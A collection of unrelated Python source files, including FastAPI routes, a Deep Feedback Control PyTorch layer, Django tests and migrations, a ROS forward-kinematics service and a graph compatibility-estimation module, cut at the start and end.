def fit(self, x_train):
# type: (numpy.array) -> None
assert len(x_train.shape) == 2
self._impl.fit(x_train)
def predict(self, x_test):
# type: (numpy.array) -> Any
assert len(x_test.shape) == 2
return numpy.array(list(self.predict_generator(x_test)))
@property
def labels_(self):
return self._impl.labels_
@property
def cluster_centers_(self):
return self._impl.cluster_centers_
|
"""
pytchat is a lightweight python library to browse youtube livechat without Selenium or BeautifulSoup.
"""
__copyright__ = 'Copyright (C) 2019, 2020, 2021 taizan-hokuto'
__version__ = '0.5.5'
__license__ = 'MIT'
__author__ = 'taizan-hokuto'
__author_email__ = '55448286+taizan-hokuto@users.noreply.github.com'
__url__ = 'https://github.com/taizan-hokuto/pytchat'
from .exceptions import (
ChatParseException,
ResponseContextError,
NoContents,
NoContinuation,
IllegalFunctionCall,
InvalidVideoIdException,
UnknownConnectionError,
RetryExceedMaxCount,
ChatDataFinished,
ReceivedUnknownContinuation,
FailedExtractContinuation,
VideoInfoParseError,
PatternUnmatchError
)
from .api import (
config,
LiveChat,
LiveChatAsync,
ChatProcessor,
CompatibleProcessor,
DummyProcessor,
DefaultProcessor,
HTMLArchiver,
TSVArchiver,
JsonfileArchiver,
SimpleDisplayProcessor,
SpeedCalculator,
SuperchatCalculator,
create
)
# flake8: noqa
|
from fastapi import FastAPI,Query
from typing import Optional
from typing import List
app = FastAPI()
fake_items_db = [{"item_name": "Foo"}, {"item_name": "Bar"}, {"item_name": "Baz"}]
@app.get("/items/")
async def read_item(skip : int = 0, limit:int = 10):
return fake_items_db[skip:skip+limit]
@app.get("/users/{user_id}/items/{item_id}")
async def read_user_item(user_id: int, item_id: str, q: Optional[str] = None, short: bool = False):
item = {"item_id": item_id, "owner_id": user_id}
print(item)
if q:
item.update({"q": q})
if short:
item.update(
{"description": "This is an amazing item that has a long description"}
)
print(item)
return item
@app.get("/item_validation/")
async def read_items1(q:Optional[str] = Query("fixedquery",max_length=50)):
results = {"test" : "a"}
if q:
results.update({"test1":q})
return results
@app.get("/item_list/")
async def list_parameter(q:List[str]=Query(None)):
query_items = {"q": q}
print(query_items)
return query_items
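# Example requests against the routes above (illustrative values):
#   GET /items/?skip=1&limit=2        -> [{"item_name": "Bar"}, {"item_name": "Baz"}]
#   GET /users/7/items/abc?q=hi&short=true
#   GET /item_validation/?q=hello     -> {"test": "a", "test1": "hello"}
#   GET /item_list/?q=foo&q=bar       -> {"q": ["foo", "bar"]}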
|
from unittest import TestCase
class YamlRulesTest(TestCase):
def test_all_kinds(self):
"""
Test that we've enumerated all the possible values for kind and
kind_detail in the YAML files.
"""
from vectordatasource.meta import find_yaml_path
from vectordatasource.meta.kinds import parse_all_kinds
import os.path
yaml_path = find_yaml_path()
sort_rank_path = os.path.join(
os.path.split(yaml_path)[0], 'spreadsheets', 'sort_rank')
# should be able to execute this without throwing an exception.
all_kinds = parse_all_kinds(yaml_path, sort_rank_path, True)
# and we should get some data back
self.assertTrue(all_kinds)
|
#!/usr/bin/env python3
# Copyright 2021 Alexander Meulemans, Matilde Tristany, Maria Cervera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @title :networks/dfc_layer.py
# @author :mc
# @contact :mariacer@ethz.ch
# @created :28/11/2021
# @version :1.0
# @python_version :3.7.4
"""
Implementation of a layer for Deep Feedback Control
---------------------------------------------------
A layer that is prepared to be trained with DFC.
"""
import numpy as np
import torch
import torch.nn as nn
from networks.layer_interface import LayerInterface
class DFCLayer(LayerInterface):
"""Implementation of a Deep Feedback Control layer.
It contains the following important functions:
* forward: which computes the linear activation based on the previous layer
as well as the post non-linearity activation. It stores these in the
attributes "_linear_activations" and "_activa.tions".
* compute_forward_gradients: computes the forward parameter updates and
stores them under "grad", by using the pre-synaptic activations and the
controller feedback. The update is based on a voltage-difference rule.
* compute_forward_gradients_continuous: same as "compute_forward_gradients"
but it performs an integration over time.
* compute_feedback_gradients: compute the feedback gradients.
* compute_feedback_gradients_continuous: same as
"compute_feedback_gradients" but it performs an integration over time.
Args:
(....): See docstring of class :class:`layer_interface.LayerInterface`.
last_layer_features (int): The size of the output layer.
"""
def __init__(self, in_features, out_features, last_layer_features,
bias=True, requires_grad=False, forward_activation='tanh',
initialization='orthogonal',
initialization_fb='weight_product'):
super().__init__(in_features, out_features, bias=bias,
requires_grad=requires_grad,
forward_activation=forward_activation,
initialization=initialization)
if initialization_fb is None:
initialization_fb = initialization
self._initialization_fb = initialization_fb
self._last_features = last_layer_features
self._activations = None
self._linear_activations = None
# Create and initialize feedback weights.
self.set_direct_feedback_layer(last_layer_features, out_features)
# The "weight_product" initialization is applied at the network level,
# since it requires knowledge of all weight matrices. So here, we
# initialize them equal to the feedforward weights and then they will get
# overwritten.
if initialization_fb=='weight_product':
initialization_fb = initialization
self.init_layer(self._weights_backward,
initialization=initialization_fb)
@property
def weights_backward(self):
"""Getter for read-only attribute :attr:`_weights_backward`."""
return self._weights_backward
@weights_backward.setter
def weights_backward(self, tensor):
"""Setter for feedback weights.
Args:
tensor (torch.Tensor): The tensor of values to set.
"""
self._weights_backward = tensor
@property
def activations(self):
"""Getter for read-only attribute :attr:`activations` """
return self._activations
@activations.setter
def activations(self, value):
""" Setter for the attribute activations"""
self._activations = value
@property
def linear_activations(self):
"""Getter for read-only attribute :attr:`linear_activations` """
return self._linear_activations
@linear_activations.setter
def linear_activations(self, value):
"""Setter for the attribute :attr:`linear_activations` """
self._linear_activations = value
def set_direct_feedback_layer(self, last_features, out_features):
"""Create the network backward parameters.
This layer connects the output layer to a hidden layer. No biases are
used in direct feedback layers. These backward parameters have no
gradient as they are fixed.
Note that as opposed to DFA, here the backwards weights are not
Parameters.
Args:
(....): See docstring of method
:meth:`layer_interface.LayerInterface.set_layer`.
"""
self._weights_backward = torch.empty((out_features, last_features))
def forward(self, x):
"""Compute the output of the layer.
This method applies first a linear mapping with the parameters
``weights`` and ``bias``, after which it applies the forward activation
function.
In the forward pass there is no noise, and thus the normal activations
and the low-pass filtered activations are identical.
Args:
x (torch.Tensor): Mini-batch of size `[B, in_features]` with input
activations from the previous layer or input.
Returns:
The mini-batch of output activations of the layer.
"""
a = x.mm(self.weights.t())
if self.bias is not None:
a += self.bias.unsqueeze(0).expand_as(a)
self.linear_activations = a
self.linear_activations_lp = a
self.activations = self.forward_activation_function(a)
self.activations_lp = self.forward_activation_function(a)
return self.activations
def compute_forward_gradients(self, delta_v, r_previous, scale=1.,
saving_ndi_updates=False,
learning_rule='nonlinear_difference'):
"""Computes forward gradients using a local-in-time learning rule.
This function applies a non-linear difference learning rule as described
in Eq. (5) in the paper. Specifically, it computes the difference between
the non-linear transformation of basal and somatic voltages.
Depending on the option ``saving_ndi_updates`` these updates will be
stored in different locations (see argument docstring).
Args:
delta_v: The feedback teaching signal from the controller.
r_previous (torch.Tensor): The activations of the previous layer.
scale (float): Scaling factor for the gradients.
saving_ndi_updates (boolean): Whether to save the non-dynamical
inversion updates. When ``True``, computed updates are added to
``ndi_updates_weights`` (and bias) to later compare with the
steady-state/continuous updates. When ``False``, computed
updates are added to ``weights.grad`` (and bias), to be later
updated.
learning_rule (str): The type of learning rule.
"""
batch_size = r_previous.shape[0]
if learning_rule == "voltage_difference":
teaching_signal = 2 * (-delta_v)
elif learning_rule == "nonlinear_difference":
# Compute feedforward activations in basal and somatic compartments.
v_ff = torch.matmul(r_previous, self.weights.t())
if self.bias is not None:
v_ff += self.bias.unsqueeze(0).expand_as(v_ff)
v = delta_v + v_ff
# Compute the teaching signal based on the basal-somatic difference.
teaching_signal = self.forward_activation_function(v) - \
self.forward_activation_function(v_ff)
else:
raise ValueError('The rule %s is not valid.' % learning_rule)
# Compute the gradients and actual updates.
weights_grad = - 2 * 1./batch_size * teaching_signal.t().mm(r_previous)
weight_update = scale * weights_grad.detach()
if self.bias is not None:
bias_grad = - 2 * teaching_signal.mean(0)
bias_update = scale * bias_grad.detach()
# Store the updates appropriately.
if saving_ndi_updates:
self.ndi_updates_weights = weight_update
if self.bias is not None:
self.ndi_updates_bias = bias_update
else:
self._weights.grad += weight_update
if self.bias is not None:
self._bias.grad += bias_update
def compute_forward_gradients_continuous(self, v_time, v_ff_time,
r_previous_time, t_start=None, t_end=None,
learning_rule='nonlinear_difference'):
r"""Computes forward gradients using an integration (sum) of voltage
differences across compartments.
This weight update is identical to ``compute_forward_gradients``
except that it integrates over more than one timestep.
However, here the somatic and basal voltages are assumed to have been
computed outside and provided as an input argument.
Args:
v_time: The somatic voltages at different timesteps.
v_ff_time: The basal voltages at different timesteps.
r_previous_time: The activations of the previous layer at different
timesteps.
t_start (int): The initial time index for the integration.
t_end (int): The final time index for the integration.
learning_rule (str): The type of learning rule.
"""
batch_size = r_previous_time.shape[1]
# Get the boundaries across which to compute the summation.
if t_start is None:
t_start = 0
if t_end is None:
t_end = v_time.shape[0]
T = t_end - t_start
if learning_rule == "voltage_difference":
# Compute the teaching signal based on the voltage difference.
teaching_signal = v_time[t_start:t_end] - v_ff_time[t_start:t_end]
elif learning_rule == "nonlinear_difference":
# Compute the teaching signal based on the basal-somatic difference.
teaching_signal = \
self.forward_activation_function(v_time[t_start:t_end]) - \
self.forward_activation_function(v_ff_time[t_start:t_end])
else:
raise ValueError('The rule %s is not valid.' % learning_rule)
# Compute the gradients.
if self.bias is not None:
bias_grad = -2 * 1. / T * torch.sum(teaching_signal, axis=0).mean(0)
teaching_signal = teaching_signal.permute(0, 2, 1)
weights_grad = -2 * 1. / batch_size * 1. / T * \
torch.sum(teaching_signal @ \
r_previous_time[t_start:t_end, :, :], axis=0)
# Store the updates appropriately.
if self.bias is not None:
self._bias.grad = bias_grad.detach()
self._weights.grad = weights_grad.detach()
def compute_feedback_gradients_continuous(self, v_fb_time, u_time,
t_start=None, t_end=None,
sigma=1., beta=0., scaling=1.):
r"""Computes feedback gradients using an integration (sum) of voltage.
This weight update is identical to :meth:`compute_feedback_gradients`
except that it integrates over more than one timestep.
It follows the differential equation:
.. math::
\frac{dQ_i}{dt} = -\mathbf{v}_i^\text{fb} \mathbf{u}(t)^T - \
\beta Q_i
Refer to :meth:`compute_feedback_gradients` for variable details.
Note that pytorch saves the positive gradient, hence we should save
:math:`-\Delta Q_i`.
Args:
v_fb_time (torch.Tensor): The apical compartment voltages over
a certain time period.
u_time (torch.Tensor): The control inputs over certain time period.
t_start (torch.Tensor): The start index from which the summation
over time should start.
t_end (torch.Tensor): The stop index at which the summation over
time should stop.
sigma (float): The standard deviation of the noise in the network
dynamics. This is used to scale the fb weight update, such that
its magnitude is independent of the noise variance.
beta (float): The homeostatic weight decay parameter.
scaling (float): In the theory for the feedback weight updates, the
update for each layer should be scaled with
:math:`(1+\tau_{v}/\tau_{\epsilon})^{L-i}`, with L the amount of
layers and i the layer index. ``scaling`` should be the factor
:math:`(1+\tau_{v}/\tau_{\epsilon})^{L-i}` for this layer.
"""
batch_size = v_fb_time.shape[1]
# Get the boundaries across which to compute the summation.
if t_start is None:
t_start = 0
if t_end is None:
t_end = v_fb_time.shape[0]
T = t_end - t_start
# Compute the gradient scaling.
if sigma < 0.01:
scale = 1 / 0.01 ** 2
else:
scale = 1 / sigma ** 2
scale *= scaling
# Compute the update.
feedbackweights_grad = scale/(T * batch_size) * \
torch.sum(v_fb_time[t_start:t_end].permute(0,2,1) \
@ u_time[t_start:t_end], axis=0)
feedbackweights_grad += beta * self._weights_backward
self._weights_backward.grad = feedbackweights_grad.detach()
def save_feedback_batch_logs(self, writer, step, name, no_gradient=False,
pretraining=False):
"""Save feedback weight stats for the latest mini-batch.
Args:
writer (SummaryWriter): Summary writer from tensorboardX.
step (int): The global step used for the x-axis of the plots.
name (str): The name of the layer.
no_gradient (bool): Flag indicating whether we should skip saving
the gradients of the feedback weights.
pretraining (bool): Flag indicating that the training is in the
initialization phase (only training the feedback weights).
"""
if pretraining:
prefix = 'feedback_training/{}/'.format(name)
else:
prefix = name + '/'
feedback_weights_norm = torch.norm(self.weights_backward)
writer.add_scalar(tag=prefix + 'feedback_weights_norm',
scalar_value=feedback_weights_norm,
global_step=step)
if self.weights_backward.grad is not None:
feedback_weights_grad_norm = torch.norm(self.weights_backward.grad)
writer.add_scalar(tag=prefix + 'feedback_weights_gradient_norm',
scalar_value=feedback_weights_grad_norm,
global_step=step)
@property
def name(self):
return 'DFCLayer'
|
"""Creates a module and necessary tools for averaging and aggregating timeline reports."""
from collections import defaultdict
import itertools
import re
from statistics import mean
def parse_timeline_events(timeline):
"""Update the timeline event map from the timeline output.
Non-commented timeline entries are parsed and the event timestamp is appended
to the list of times an event label occurs.
For example:
3.5 "Phantom Flurry" sync /:Suzaku:32DD:/
7.0 "Screams Of The Damned" sync /:Suzaku:32D2:/
10.5 "Phantom Flurry" sync /:Suzaku:32DD:/
Will create the following mapping:
{
'"Phantom Flurry" sync /:Suzaku:32DD:/': [3.5, 10.5],
'"Screams Of The Damned" sync /:Suzaku:32D2:/': [7.0]
}
"""
timeline_event_map = defaultdict(list)
for line in timeline:
# Ignore comments, alertall, hideall, etc by
# only reading lines starting with a number
if not line[0].isdigit():
continue
# Remove trailing comment, if any
clean_line = line.split('#')[0]
# Split the line into sections
match = re.search(r'^(?P<time>[\d\.]+)\s+"(?P<label>.+)"\s+(?P<options>.+)', clean_line)
if not match:
continue
event_time = float(match[1])
label = '"{match[2]}" {match[3]}'.format(match=match)
# Add the timestamp to the event's list of occurrences
timeline_event_map[label].append(event_time)
return timeline_event_map
def output_to_timeline(timeline_event_map):
"""Returns a timeline-friendly list from an event mapping.
Creates a list of events sorted in ascending numerical order as Advanced
Combat Tracker would expect. Returns the list as a Python list, to be altered
or printed into the expected parsable format.
"""
timeline_events = set()
for key, values in timeline_event_map.items():
for value in values:
timeline_events.add('{time} {event}'.format(time=value, event=key))
return sorted(list(timeline_events), key=lambda s: float(s.split()[0]))
def create_averaging_function(threshold):
"""Creates and returns a function to group by.
Creates the averaging function to be used with the itertools.groupby()
function. Takes a threshold value in seconds as input to average groups
of similar event times.
"""
key = None
def averaging_function(event_time):
"""Averages event time values based on a threshold.
For any event where the event time is less than the key value, keep
returning key. If the event time exceeds the key, update the key value.
"""
nonlocal key
if key is None:
key = event_time + threshold
elif event_time >= key:
key = event_time + threshold
return key
return averaging_function
def average_similar_events(values, threshold):
"""Return a list where similar numbers have been averaged.
Items are grouped using the supplied threshold via create_averaging_function()
and each group is replaced by its mean, rounded to one decimal place.
"""
grouped_values = itertools.groupby(values, create_averaging_function(threshold))
return list(round(mean(group), 1) for _, group in grouped_values)
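# Worked example (hypothetical timings): with a 2.0 second threshold the events
# at 3.5 and 3.7 fall into one group and are averaged, while 10.5 stays alone:
#   average_similar_events([3.5, 3.7, 10.5], 2.0)  ->  [3.6, 10.5]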
class TimelineAggregator():
"""Aggregates timelines and averages their event times.
Takes an input of N timelines and attempts to smooth their event times to
find the line of best fit when determining when events occur.
"""
def __init__(self, timelines):
self.timelines = timelines
def aggregate(self, averaging_threshold=2.0):
"""Aggregates timelines and returns a list of their events.
Aggregates timelines with an averaging threshold defined in seconds. Any
duplicate events found with the same memory signature within those events
will be averaged by taking the mean of each near-duplicate event grouping.
"""
aggregate_event_map = defaultdict(list)
# Parse all events within the timelines passed to the aggregator
for timeline in self.timelines:
for key, values in parse_timeline_events(timeline).items():
aggregate_event_map[key] += values
# Average similar values for duplicate events to get a better approximate timeline
for key, values in aggregate_event_map.items():
aggregate_event_map[key] = average_similar_events(sorted(values), averaging_threshold)
# Return the aggregated event mapping as a timeline output
return output_to_timeline(aggregate_event_map)
|
# Generated by Django 2.2 on 2019-04-17 02:13
from django.db import migrations
def drop_madison_taproom(apps, schema_editor):
venue = apps.get_model("venues.Venue")
beer_price = apps.get_model("beers.BeerPrice")
beer_price.objects.filter(venue__id=2).delete()
venue.objects.filter(id=2).delete()
class Migration(migrations.Migration):
dependencies = [
("venues", "0012_auto_20190328_1915"),
]
operations = [
migrations.RunPython(drop_madison_taproom, migrations.RunPython.noop),
]
|
#!/usr/bin/env python
# import modules
import rospy
import numpy as np
from std_msgs.msg import Float64
from sympy import symbols, cos, sin, pi, simplify
from sympy.matrices import Matrix
from geometry_msgs.msg import Point
from kuka_arm.srv import *
def handle_calculate_FK_request(req):
endPoints = Point()
q1_in = req.q1
q2_in = req.q2
q3_in = req.q3
q4_in = req.q4
q5_in = req.q5
q6_in = req.q6
q1_in = 0
q2_in = 0
q3_in = 0
q4_in = 0
q5_in = 0
q6_in = 0
print(req.q1)
print(req.q2)
print(req.q3)
print(req.q4)
print(req.q5)
print(req.q6)
### FK code
# Create symbols
q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8') #theta_i
d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8')
a0, a1, a2, a3, a4, a5, a6 = symbols('a0:7')
alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6 = symbols('alpha0:7')
# Create Modified DH parameters
s = {alpha0: 0, a0: 0, d1: 0.75,
alpha1: -pi/2, a1: 0.35, d2: 0, q2:q2-pi/2,
alpha2: 0, a2: 1.25, d3: 0,
alpha3: -pi/2, a3: -0.054, d4: 1.5,
alpha4: pi/2, a4: 0, d5: 0,
alpha5: -pi/2, a5: 0, d6: 0,
alpha6: 0, a6: 0, d7: 0.303, q7:0}
#
# Define Modified DH Transformation matrix
T0_1 = Matrix([[ cos(q1), -sin(q1), 0, a0],
[sin(q1)*cos(alpha0), cos(q1)*cos(alpha0), -sin(alpha0), -sin(alpha0)*d1],
[sin(q1)*sin(alpha0), cos(q1)*sin(alpha0), cos(alpha0), cos(alpha0)*d1],
[ 0, 0, 0, 1]])
T0_1 = T0_1.subs(s)
T1_2 = Matrix([[ cos(q2), -sin(q2), 0, a1],
[sin(q2)*cos(alpha1), cos(q2)*cos(alpha1), -sin(alpha1), -sin(alpha1)*d2],
[sin(q2)*sin(alpha1), cos(q2)*sin(alpha1), cos(alpha1), cos(alpha1)*d2],
[ 0, 0, 0, 1]])
T1_2 = T1_2.subs(s)
T2_3 = Matrix([[ cos(q3), -sin(q3), 0, a2],
[sin(q3)*cos(alpha2), cos(q3)*cos(alpha2), -sin(alpha2), -sin(alpha2)*d3],
[sin(q3)*sin(alpha2), cos(q3)*sin(alpha2), cos(alpha2), cos(alpha2)*d3],
[ 0, 0, 0, 1]])
T2_3 = T2_3.subs(s)
T3_4 = Matrix([[ cos(q4), -sin(q4), 0, a3],
[sin(q4)*cos(alpha3), cos(q4)*cos(alpha3), -sin(alpha3), -sin(alpha3)*d4],
[sin(q4)*sin(alpha3), cos(q4)*sin(alpha3), cos(alpha3), cos(alpha3)*d4],
[ 0, 0, 0, 1]])
T3_4 = T3_4.subs(s)
T4_5 = Matrix([[ cos(q5), -sin(q5), 0, a4],
[sin(q5)*cos(alpha4), cos(q5)*cos(alpha4), -sin(alpha4), -sin(alpha4)*d5],
[sin(q5)*sin(alpha4), cos(q5)*sin(alpha4), cos(alpha4), cos(alpha4)*d5],
[ 0, 0, 0, 1]])
T4_5 = T4_5.subs(s)
T5_6 = Matrix([[ cos(q6), -sin(q6), 0, a5],
[sin(q6)*cos(alpha5), cos(q6)*cos(alpha5), -sin(alpha5), -sin(alpha5)*d6],
[sin(q6)*sin(alpha5), cos(q6)*sin(alpha5), cos(alpha5), cos(alpha5)*d6],
[ 0, 0, 0, 1]])
T5_6 = T5_6.subs(s)
T6_G = Matrix([[ cos(q7), -sin(q7), 0, a6],
[sin(q7)*cos(alpha6), cos(q7)*cos(alpha6), -sin(alpha6), -sin(alpha6)*d7],
[sin(q7)*sin(alpha6), cos(q7)*sin(alpha6), cos(alpha6), cos(alpha6)*d7],
[ 0, 0, 0, 1]])
T6_G = T6_G.subs(s)
#
# Create individual transformation matrices
T0_1 = simplify(T0_1)
T0_2 = simplify(T0_1 * T1_2)
T0_3 = simplify(T0_2 * T2_3)
T0_4 = simplify(T0_3 * T3_4)
T0_5 = simplify(T0_4 * T4_5)
T0_6 = simplify(T0_5 * T5_6)
T0_G = simplify(T0_6 * T6_G)
#
# Correction for the gripper orientation
R_z = Matrix([[ cos(np.pi), -sin(np.pi), 0, 0],
[ sin(np.pi), cos(np.pi), 0, 0],
[ 0, 0, 1, 0],
[ 0, 0, 0, 1]])
R_y = Matrix([[ cos(-np.pi/2), 0,sin(-np.pi/2), 0],
[ 0, 1, 0, 0],
[ -sin(-np.pi/2), 0,cos(-np.pi/2), 0],
[ 0, 0, 0, 1]])
R_corr = simplify(R_z*R_y)
#
# Print to compare with simulation results
print(T3_4[0:3,0:3])
print(T4_5[0:3,0:3])
print(T5_6[0:3,0:3])
print(simplify((T3_4*T4_5*T5_6))[0:3,0:3])
print(simplify((T5_6*T4_5*T3_4))[0:3,0:3])
print(T0_1.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_2.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_3.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_4.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_5.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_6.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_G.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
###
T0_G_eval = T0_G.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in})
xG = T0_G_eval[0,3]
yG = T0_G_eval[1,3]
zG = T0_G_eval[2,3]
print(xG)
print(yG)
print(zG)
return CalculateFKResponse(xG)
def FK_service():
rospy.init_node('FK_calculator')
service = rospy.Service('~calculate_FK', CalculateFK, handle_calculate_FK_request)
print "Ready to receive a FK request"
rospy.spin()
if __name__ == "__main__":
FK_service()
|
from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@gmail.com', password='pass12345'):
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
email = 'test@gmail.com'
password = 'test12345'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
email="test@GMAIL.COM"
user = get_user_model().objects.create_user(email, 'test124')
self.assertEqual(user.email, email.lower())
def test_new_user_invalid_email(self):
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test1234')
def test_create_new_super_user(self):
user = get_user_model().objects.create_superuser(
'test@testt.com',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_tag_str(self):
tag = models.Tag.objects.create(
user=sample_user(),
name='Vegan'
)
self.assertEqual(str(tag), tag.name)
def test_ingredients_str(self):
ingredient = models.Ingredient.objects.create(
user=sample_user(),
name='Cucumber'
)
self.assertEqual(str(ingredient), ingredient.name)
def test_recepie_str(self):
recepie = models.Recepie.objects.create(
user=sample_user(),
title='Steak and mushroom sauce',
time_minutes=5,
price=22.00
)
self.assertEqual(str(recepie), recepie.title)
@patch('uuid.uuid4')
def test_recipe_file_name_uuid(self, mock_uuid):
"""Test that image is saved in the correct location"""
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.recipe_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/recipe/{uuid}.jpg'
self.assertEqual(file_path, exp_path)
|
from model_register import State, Country, County, GroundWaterWell, ReclamationPlant, Stream, \
Precipitation, SpreadingGround
from django.contrib import admin
admin.site.register(State)
admin.site.register(County)
admin.site.register(Country)
admin.site.register(GroundWaterWell)
admin.site.register(ReclamationPlant)
admin.site.register(Stream)
admin.site.register(Precipitation)
admin.site.register(SpreadingGround)
|
import onmt
import onmt.modules
class TranslatorParameter(object):
def __init__(self, filename):
self.model = "";
self.src = "<stdin>";
self.src_img_dir = "";
self.tgt = "";
self.output = "<stdout>";
self.beam_size = 1
self.batch_size = 1
self.max_sent_length = 100
self.dump_beam = ""
self.n_best = self.beam_size
self.replace_unk = False
self.gpu = -1
self.cuda = 0
self.verbose = False
self.beta=0.0
self.alpha=0.0
self.start_with_bos=True
self.fp16=False
self.ensemble_op='mean'
self.autoencoder=None
self.encoder_type='text'
self.read_file(filename)
def read_file(self,filename):
f = open(filename)
line = f.readline()
while line:
w = line.strip().split()
if w[0] == "model":
self.model = w[1]
elif w[0] == "beam_size":
self.beam_size = int(w[1])
line = f.readline()
class OnlineTranslator(object):
def __init__(self, model):
opt = TranslatorParameter(model)
self.translator = onmt.EnsembleTranslator(opt)
def translate(self,input):
predBatch, predScore, predLength, goldScore, numGoldWords,allGoldScores = self.translator.translate([input.split()],[])
return " ".join(predBatch[0][0])
|
"""
Estimation methods for Compatibility Estimation described in
Factorized Graph Representations for Semi-Supervised Learning from Sparse Data (SIGMOD 2020)
Krishna Kumar P., Paul Langton, Wolfgang Gatterbauer
https://arxiv.org/abs/2003.02829
Author: Wolfgang Gatterbauer
License: Apache Software License
TODO: nicer to separate the 'estimateH' from 'define_energy_H' into separate methods
"""
import numpy as np
from numpy import linalg as LA
import scipy.sparse as sparse
from numbers import Number # for isinstance(n, Number)
from scipy import optimize
import itertools
import warnings
from random import shuffle
import random
import copy
from time import time
from multiprocessing import Process, Queue  # used by estimateH_baseline_parallel below
from utils import (W_star,
to_centering_beliefs,
matrix_difference,
eps_convergence_linbp_parameterized)
from inference import linBP_symmetric_parameterized
def define_energy_H(method='DHE',
H_vec_observed=None,
weights=None, distance=1,
X=None, W=None, EC=True, variant=1,
alpha=0, beta=0):
"""Returns an energy function 'energy_H(H)' that is used by 'estimateH' to find the optimal H.
Three options: 'MHE', 'DHE', 'LHE' (for Myopic / Distant / Linear Heterophily (Compatibility) Estimation)
Original variant: constructed from X, W with chosen methods (e.g. DHE: weights, distance, variant, EC, alpha, beta)
New variant: allows passing H_vec_observed directly (estimate it once on the graph and use it for both energy and gradient)
For 'LHE':
uses: X, W, alpha, beta (alpha, beta not actively used)
ignores: H_vec_observed, EC, distance, weights, variant
For 'DHE':
If 'H_vec_observed' is specified: uses only weights, distance
else: also uses W, X, EC, variant, alpha, beta to calculate 'H_vec_observed'
For 'MHE':
If 'H_vec_observed' is specified: ignores everything
else: uses W, X, EC, variant, alpha, beta to calculate 'H_vec_observed'
Parameters
----------
method : string (Default='DHE')
Three options: 'MHE', 'DHE', 'LHE'
H_vec_observed : list [H1, H2, ..., Hd]
Hd being the row-normalized Markov matrix that is used for DHE
weights : np array (Default = np.ones(distance))
Notice that 'estimateH' allows to specify a single weight that is then transformed into an array via np.array([np.power(weights, i) for i in range(distance)])
EC : Boolean (Default=True) TODO: should better be renamed to NB (Non-Backtracking)
If true, ignores the backtracking paths (NB = True)
variant : int (Default=1)
Mostly historical, variant=1 works best, see SIGMOD 2020 paper for variants
alpha, beta : real (Default=0)
Allows different normalizations (not used)
"""
# TODO: think about centered X as input
if H_vec_observed is not None:
_, k = H_vec_observed[0].shape
else:
_, k = X.shape
if weights is None:
weights = np.ones(distance)
assert len(weights) >= distance
if alpha != 0 or beta != 0:
W = W_star(W, alpha=alpha, beta=beta)
if method in ('MHE', 'DHE') and H_vec_observed is None:
H_vec_observed = H_observed(W, X, distance=distance, NB=EC, variant=variant)
if method == 'MHE':
def energy_H(H):
return LA.norm(H_vec_observed[0] - H)
elif method == 'DHE':
# the following 5 path lengths are written explicitly in order to speed up calculation
if distance == 1:
def energy_H(H):
return LA.norm(H_vec_observed[0] - H)
elif distance == 2:
def energy_H(H):
return weights[0] * LA.norm(H_vec_observed[0] - H) \
+ weights[1] * LA.norm(H_vec_observed[1] - H.dot(H))
elif distance == 3:
def energy_H(H):
H2 = H.dot(H)
return weights[0] * LA.norm(H_vec_observed[0] - H) \
+ weights[1] * LA.norm(H_vec_observed[1] - H2) \
+ weights[2] * LA.norm(H_vec_observed[2] - H2.dot(H))
elif distance == 4:
def energy_H(H):
H2 = H.dot(H)
H3 = H2.dot(H)
return weights[0] * LA.norm(H_vec_observed[0] - H) \
+ weights[1] * LA.norm(H_vec_observed[1] - H2) \
+ weights[2] * LA.norm(H_vec_observed[2] - H3) \
+ weights[3] * LA.norm(H_vec_observed[3] - H3.dot(H))
elif distance == 5:
def energy_H(H):
H2 = H.dot(H)
H3 = H2.dot(H)
H4 = H3.dot(H)
return weights[0] * LA.norm(H_vec_observed[0] - H) \
+ weights[1] * LA.norm(H_vec_observed[1] - H2) \
+ weights[2] * LA.norm(H_vec_observed[2] - H3) \
+ weights[3] * LA.norm(H_vec_observed[3] - H4) \
+ weights[4] * LA.norm(H_vec_observed[4] - H4.dot(H))
else:
def energy_H(H):
S = 0
for i in range(distance):
S += weights[i] * LA.norm(H_vec_observed[i] - LA.matrix_power(H, i + 1))
return S
elif method == 'LHE':
def energy_H(H):
return LA.norm(X - W.dot(X).dot(H))
else:
raise Exception("You specified a non-existing method")
return energy_H
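# Usage sketch (assumed shapes, illustrative only): build an LHE energy for an
# [n x k] belief matrix X and an [n x n] sparse adjacency W, then evaluate it
# for a candidate k x k compatibility matrix H; the estimation routines in this
# module minimize such an energy over the free entries of H.
#   energy = define_energy_H(method='LHE', X=X, W=W)
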